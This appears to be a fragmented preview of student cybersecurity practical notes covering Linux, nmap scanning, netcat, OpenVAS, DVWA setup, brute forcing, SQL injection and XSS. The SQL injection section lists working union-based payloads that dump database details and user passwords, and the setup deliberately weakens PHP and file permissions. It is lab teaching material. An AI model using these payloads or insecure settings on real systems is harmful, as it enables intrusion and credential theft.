Notesale: Turn your study into money

Document Preview

Extracts from the notes are below, to see the PDF you'll receive please use the links above

---

2150002 - CYBER SECURITY

130020107024

PRACTICAL 1
1
...
UNIX is a
command-driven operating system in which the user has to type in commands at the
computer console in order to operate the computer (“Introduction to Linux, 2001)
...
It was originally developed in the 1970’s at AT&T as a multitasking
system for minicomputers and mainframes
...


In 1991, Linus Torvalds, a student at the University of Helsinki, sought to create a new
version of UNIX; therefore, he joined forces with a group of programmers to create a new
operating system—Linux
...
As a result, the world now has a powerful, robust, and full-featured
operating system that continues to change and grow
...
Since
the Linux source code is available, anyone can copy, modify, and distribute this software
...
Despite of the
command-line origins of Linux, these distributing companies are working to make the
Graphical User Interface (GUI), the primary means of user interface; thus more user
friendly
...
Although Linux distribution varies, the following list is a summary of what to
expect from any version of Linux:
1
AIT-CE

2150002 - CYBER SECURITY
 File Services: NFS, Samba

130020107024



Graphics program: image manipulation, retouching, and paint capabilities



Mail server software: SendMail, POP, and IMAP servers



Multimedia tools: Support JPEG, GIF, PNG, TIFF, MPEG, AVI, and QuickTime
video files
...
Linux Distributions

A Linux distribution is an assemblage of software with its own packaging schemes,
defaults and configuration methods
...
Specifically, you may not
modify the Fedora installation and maintain the Fedora name
...
You may
also not then say that your product "contains Fedora" or is an alternate "edition" of
Fedora
...
If you use the
Fedora name in such a manner, you must also note that Fedora is a registered
trademark, and not attempt to confuse users or allude to a non-existant relationship
between you and the Fedora Project or Red Hat
...

The installation process is simple and does a great job of detecting and automatically
configuring many sound and video card adapters
...


2
AIT-CE

2150002 - CYBER SECURITY
130020107024
 Debian GNU/Linux: This distribution is one of the oldest and recognized favorites
among advanced technical groups
...



OpenLinux (Caldera): The OpenLinux distribution has shrink-wrapped software
packages that include the first graphical Linux installation
...




Red Hat: Red Hat is the first company to mass market the Linux operating system
...




Slackware: Of all of the surviving Linux distributions, Slackware has been around
the longest
...




SuSE: This distribution derives from Germany
...

As a result, they have a terrific graphical configuration tool called SaX
...
TurboLinux has lead the way in
the turnkey installations by providing CD installations exclusive to Server,
Workstation, and Clusters
...
Configuring Your System

After the installation process of the files is complete, the next step is configuring the
system
...
Selecting a language
2
...
Type of software to install

130020107024

4
...
Adjusting the time settings
6
...
Creating the root password (for the Administrator), as well as the user name and
password for users
8
...
Linux Applications

Once the user is familiar with navigating the KDE GUI, it is time to explore the numerous
applications Linux has to offer
...
Programs for
the SuSE Linux include:


OpenOffice: word processing, spreadsheets, drawing



Adobe Acrobat Reader



Konqueror: The KDE File Manager and Web Browser



Kmail: The KDE Mail Application



Evolution: An Email and Calendar Program



Sound Application, TV, Video, Radio, and Webcam



K3b: The KDE Burning Application



Digital Cameras



Kooka: Scanning Application



Graphics with the GIMP



Shell system

It is useful to note that the Linux operating system allows the user to continue to use old
files that were created in different operating systems
...
SuSe
Linux allows the user to work with old files without difficulty
...
Files, Folders, and Directories

130020107024

To use the shell efficiently, it is useful to have some knowledge about the file and directory
structures of Linux
...


The place where the entire directory tree begins is called the root directory
...
Root is one of the several users on the Linux system,
which as mentioned before, is a multiuser system
...


The Linux file system is then subdivided into many branches known as subdirectories
...

/

bin

boot

dev

etc

home

lib

sbin

root

opt

vmlinuz

kde

had sda st0

mnt

tmp

usr

local

sbin

var

gnome

ld
...
c

bin

bin

etc

lib

share

f2c

lib

xdm sterm xv

man

bin lib ftp man

bin lib pub

doc man

faq howto packages

Table Overview of Important Directories
Directory

Description
5

AIT-CE

2150002 - CYBER SECURITY
/
Root directory, starting point of the directory tree

130020107024

/home

(private) directories of users

/dev

Device files that represent hardware components

/etc

Important files for system configuration

/etc/init
...
d

Boot scripts

/usr/include

Header files for the C compiler

/usr/include/g++ Header files for the C++ compiler
/usr/share/doc

Various documentation files

/usr/man

System manual pages (man pages)

/usr/src

Source code of system software

/usr/src/linux

Kernel source code

/tmp

Temporary files

/var/tmp

Large temporary files

/usr

Contains all application programs

/var

Configuration files (e
...
, those linked from /usr)

/var/log

System log files

/var/adm

System administration data

/lib

Shared libraries (for dynamically linked programs)

/proc

Process file system

/usr/local

Local, distribution-independent extensions

/opt

Optional software, larger add-on program packages (such as KDE, GNOME,
Netscape

1
...
Set linux Package Repositories
#

cd /etc/yum
...
d/

#

vim ait
...
3 CONCLUSION

Deciding what operating system is easier to use all depends on the user
...
After actually giving Linux a chance, any user can decide that it is easier
to use than Windows
...
If a user does end up
disliking it, he/she can go back to using Windows
...


Now you have seen that it is possible to set up your system to run more than one operating
system on your computer
...
This will require creating
partitions on your Hard Disk, which can be done creating a multi boot system
...


8
AIT-CE

2150002 - CYBER SECURITY

130020107024

PRACTICAL – 2
AIM : Port Scanning USING NMAP
2
...
Objectives
1
...

2
...


2
...
Introduction:
 A service is a program that waits inside a loop for a request message from a
client, and acts on the request
...
e
...
Essentially, a port scan consists of sending a message to
each port, one at a time and examining the response received
...

 Port Scanning is one of the most popular among the reconnaissance
techniques attackers use
...
3
...
If vulnerable or insecure services are discovered, the hacker
may be able to exploit these to gain unauthorized access
...
While a complete scan of all these ports may not be
practical, analysis of popular ports should be performed
...

Popular port scanning programs include: Nmap, Netscan Tools, Superscan and Angry
IP Scanner
...
Well Known Ports (from 0 through 1023)
2
...
Dynamic and/or Private Ports (from 49152 through 65535)
...
3
...
TCP and UDP Port Scanning
Remember thatTCP offers robust communication and is considered a connection
protocol
...

The TCP header contains a 1-byte field for the flags
...




ACK: The receiver will send an ACK to acknowledge data
...




FIN: Used during a normal shutdown to inform the other host that thesender has
no more data to send
...




PSH: Used to force data delivery without waiting for buffers to fill
...


At the conclusion of communication, TCP terminates the session by using what is
called a four-step shutdown
...


10
AIT-CE

2150002 - CYBER SECURITY

130020107024

From a scanning standpoint, this means that TCP has the capability to return many
different types of responses to a scanning program
...
Many of these methods are built in
to popular port-scanning tools
...


2
...
2
...
4
...
Nmap is available for Windows and Linux as a GUI and command-line
program
...
It also has the ability to
blind scan and zombie scan, and it enables you to control the speed of the scan from slow to
very fast
...
As you can imagine, such a capability is attractive to the people
who secure networks as well as those who attack networks
...


2
...
1
...
It is easily logged and detected because a full connection is established
...




TCP SYN scan: This type of scan is known as half-open, because a full TCP
connection is not established
...
Open ports reply with a
SYN/ACK; closed ports respond with a RST/ACK
...
This type of scan sends a FIN packet to the target port
...
This technique is usually effective only on Unix devices
...
If the OS has implemented TCP per RFC
793, closed ports will return an RST
...

Closed ports should return an RST
...
4
...
NMAP Installation Step
# yum -y install nmap
# rpm -ivh Zemap-

12
AIT-CE

2150002 - CYBER SECURITY

130020107024

2
...
3
...
Key among that information is the “interesting ports
table”
...
The state is
either open, filtered, closed, or unfiltered
...
Filtered means that a
firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell
whether it is open or closed
...
Ports are classified as unfiltered when they
are responsive to Nmap's probes, but Nmap cannot determine whether they are open
or closed
...




The port table may also include software version details when version detection
has been requested
...


13
AIT-CE

2150002 - CYBER SECURITY
2
...
3 Nmap Scan Options

130020107024

When we use the command line in the Nmap tool instead of GUI, we need some option
which listed with the command to define the type of scan methods
...


Scan Option

Name

Notes

-sS

TCP SYN

Stealth scan

-sT

TCP FULL

Full connect

-sF

FIN

No reply from open port

-sN

Null

No flags are set

-sX

Xmas

URG,PUSH, and FIN are set

-sP

Ping

Performs ping

-sU

UDP Scan

Like Null scan

-sA

ACK

Performs an ACK scan

-sI

Idle Scan

Performs zombie scan

2
...
4
...

In this experiment you can use BackTrack 3 live cd to run Nmap or you can install
windows version for your machine
...
From windows
Graphical interface
1
...

2
...

3
...

14

AIT-CE

2150002 - CYBER SECURITY
130020107024
4
...
The output will be as previously discussion
...
An example for these is shown in figure 1
Command line
Note that the previous process can be done using command line interface ; Click
start, run and type the following command :
Nmap [nmap switches](ip address of the target)
Example:


S
can a single ip address
nmap hostname
nmap 192
...
1
...
aitindia
...
ashish
...
com



Scanning for a single port on a machine
nmap –p portnumber hostname
nmap -p 192
...
1
...

nmap network ID/subnet-mask
nmap 192
...
1
...

nmap -v hostname
nmap -v 192
...
1
...
168
...
1



Scan a machine for UDP open ports
...
168
...
1


To check which protocol(not port) such as TCP, UDP, ICMP etc is supported
by the remote machine
...

nmap –sO hostname
nmap -sO localhost



To scan a system for operating system and uptime details
nmap -O hostname
nmap -O google
...
1

AIT_CEIT

17

CYBER SECURITY

ENROLLMENT NO

Figure

...
Click start – All Applications –Network Mapping – choose Zenmap ; then
a GUI similar to that will appear in windows appears and we use it like
windows
...


Click start – All Applications – Terminal –Network

Mapping – choose

Nmap ; then the shell will opened with help contains switches of nmap,
usage of each one and examples
...

Introduction :
Netcat is a wonderfully versatile tool which has been dubbed the “hackers' Swiss army
knife”
...
Netcat is designed to be a dependable “backend” device that can be used candidly or easily driven by other programs and scripts
...


Its list of features includes port scanning, transferring files, and port listening, and
it can be used as a backdoor
...

Lab Experiment
Requirements:
We need for this lab two machines , the first that runs Fedora and the other
runs Windows XP
...

Let's try implementing a simple chat using Netcat
...
From Fedora/Backtrack : we want to listen on port 4444 and accept
incoming connections on this port , type:
nc -lvvp 4444
Check to see that port 4444 is indeed listening using netstat
You will see
listening on [any] 4444
...
From Windows XP: connect to port 4444 on your Backtrack by typing
nc -vv 10
...
136
...
After connection established we can start chat as shown in Figure 1 and 2
...
This
applies to text and binary files
...
From Backtrack : We'll set up Netcat to listen to and accept the connection
and to redirect any input into a file
...
txt
2
...
txt; then we connect to
listening Netcat on computer 1 (port 4444) and send the file,type:
C:\>nc -vv 192
...
129
...
txt
3
...

Now How to I get Netcat to run on the victim machine, without remote user
intervention? The answer to this question is simply “remote code execution”
...
For example, attacks such as Buffer Overflows, SQL injection, File
Inclusion, Client Side Attacks, Trojan Horses - all aim to result in “code
execution” on the victim machine
...


AIT_CEIT

22

CYBER SECURITY

ENROLLMENT NO

PRACTICAL 4
AIM : Vulnerability Scanning with OpenVAS Security Topics
1
...
OpenVAS is the evolution of
a previous project called Nessus, which became a proprietary tool
...


2
...

• Update O pe nV AS vulnerability tests
• Create a user for scanning
• Learn to run scans in batch mode from the command-line client

3
...

• Commands preceded with “#” imply that you should be working as root
...
g
...

4
4
...
2

Update the vulnerability database
# openvas-nvt-sync

4
...

Ideally, you will want to only allow scanning on hosts that are under your
control
...

Let’s allow this user to scan hosts in our lab network
...
10
...
/16 default deny type ctrl-D to exit, and then accept
...
1

Operation
Starting the server
# /etc/init
...
Most likely, you will not
be able to run this on the virtual NSRC lab
...

5
...

# cd /home/sysadm
# vi scanme
...
10
...
250
10
...
2
...
etc
...
0
...
1 9390 sysadm nsrc+ws scanme
...
html -T txt -V -x

Alternatively, you can export into prettier HTML format with:
# openvas-client -q 127
...
0
...
txt \
openvas-output
...


5
...

• Create a git repository
• Add a cron job to scan hosts periodically (e
...
once a month)
• Use -T txt or -T xml report format
• Update the repository after each run
• Add a post-commit hook on Git to generate e-mails with different ends
...
Its main goals are to be an aid for security professionals to test their skills and
tools in a legal environment, help web developers better understand the processes of
securing web applications
...


Step 1
Install MySQL server by entering the following command:
root@ashish:~# yum –y install mysql mysql-server
When prompted, create a password for MySQL
...
We’re going to need it later
...
com/RandomStorm/DVWA/archive/v1
...
8
...
0
...
zip
You should now have a directory titled, “DVWA-1
...
8″
...
We can delete the
v1
...
8
...
0
...
0
...
zip
root@ashish:/var/www/html# mv DVWA-1
...
8 dvwa
The DVWA-1
...
8 directory should now be titled “dvwa”

Step 6
Open the DVWA database connection script by entering the following command:
root@ashish:/var/www/html# vim dvwa/config/config
...
php

Step 7
Now we need to add our MySQL password to the DVWA database connection script
...

Example:
$_DVWA[ 'db_password' ] = 'mysqlpassword';
When you’re finished adding your password, press “control” and “x” to end the editing
session
...
Then press enter to save the file
...
Join me if you want…
root@ashish:/var/www/html# cd \
Open the Apache php
...
ini
Step 9
Find the following line:
allow_url_include = Off
AIT_CEIT

27

CYBER SECURITY

ENROLLMENT NO

and replace “Off” with “On”
Example:
allow_url_include = On
Tip:
An easy way to find a string of text is to open the search prompt by pressing “control” and
“w”
Then enter the search term and press enter
...

Then press “y” to confirm your changes
...


Step 10
Change the permissions by entering the following command:
root@ashish:~# chmod -R 777 /var/www/html/dvwa
For starting MySql service
ps ax | grep mysql
systemctl enabled mysql
sytemctl start mysql
systemctl status mysql

Step 11
Log into MySQL and create a database for DVWA by entering the following commands:
root@ashish:~# mysql -u root -p
Enter Password: [your mysql password]
root@ashish:~# create database dvwa;
root@ashish:~# exit

Step 12
Open the apache
...
conf

Step 13
Move to the bottom of the file and add the following line:
ServerName localhost
AIT_CEIT

28

CYBER SECURITY

ENROLLMENT NO

When you’re finished adding the new line, press “control” and “x” to end the editing
session
...
Then press enter to save the file
...
php
Example:
http://10
...
7
...
php
and click the button that says “Create / Reset Database”

Step 16
Navigate to:
http://localhost/dvwa
Example:
http://10
...
7
...
For example, a simple bruteforce attack may have a dictionary of all words or commonly used passwords and cycle
through those words until it gains access to the account
...
Due to
the number of possible combinations of letters, numbers, and symbols, a brute force attack
can take a long time to complete
...


AIT_CEIT

29

CYBER SECURITY

ENROLLMENT NO

The first challenge of DVWA is how to login it
...
Here we
will use brute force, and use WebCruiser Web Vulnerability Scanner brute force tool
...
submit
...
1

Fig 5
...
Note that
there is a button “Bruter”, click it, it will switch to Bruter tool
...
The dictionary files are located in the
same directory with WebCruiserWVS
...
Click “Go”
to start guess process, result will be list in the window
...


AIT_CEIT

30

CYBER SECURITY

ENROLLMENT NO

Fig 5
...
An SQL query is a request for some action to be performed on a database
...
Basic Injection
Instructions:
1
...

2
...

3
...

Notes(FYI):
Below is the PHP select statement that we will be exploiting,
specifically $id
...
Sql Injection (Blind)
2
...
Input the below text into the User ID Textbox (See Picture)
...
Click Submit
Notes(FYI):
In this scenario, we are saying display all record that are
false and all records that are true
...

'0'='0' - Is equal to true, because 0 will always equal
0
...
Display Database Version
Instructions:
1
...

%' or 0=0 union select null, version() #
2
...
1
...

This is the version of the mysql database
...
Display Database User
Instructions:
1
...

%' or 0=0 union select null, user() #
Notes(FYI):
Notice in the last displayed line, root@localhost is
displayed in the surname
...

5
...
Input the below text into the User ID Textbox (See Picture)
...

This is the name of the database
...
Display all tables in information_schema
Instructions:
1
...

%' and 1=0 union select null, table_name from
information_schema
...
Click Submit
Notes(FYI):
Now we are displaying all the tables in the
information_schema database
...

7
...
Input the below text into the User ID Textbox (See Picture)
...
tables where table_name like 'user%'#
2
...

8
...
Input the below text into the User ID Textbox (See Picture)
...
columns where table_name = 'users' #
2
...

Notice there are a user_id, first_name, last_name, user and
Password column
...
Display all the columns field contents in the information_schema user table
Instructions:
1
...

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password)
from users #
2
...


AIT_CEIT

34

CYBER SECURITY

ENROLLMENT NO

Practical 7
AIM : XSS using DVWA
...




XSS enables attackers to inject client-side script into Web pages viewed by other users
...




In Addition, the attacker can send input (e
...
, username, password, session ID, etc)
which can be later captured by an external script
...
Because it thinks the script came from a trusted source, the malicious
script can access any cookies, session tokens, or other sensitive information retained by
the browser and used with that site
...


1
...
For example, the attacker could send the victim a misleading email with
a link containing malicious javascript
...
The
malicious javascript is then reflected back to the victim’s browser, where it is executed
in the context of the victim’s browser

Fig 1
...
Persistent XSS
Consider a web application that allows users to enter a username that is displayed on
each user’s profile page
...
A
malicious user notices that the web application fails to sanitize the username field and
inputs malicious JavaScript code as part of their username
...


Fig 2
...
3
and as shown in Fig 1 try to write
to the box, and submit it
...

Fig

---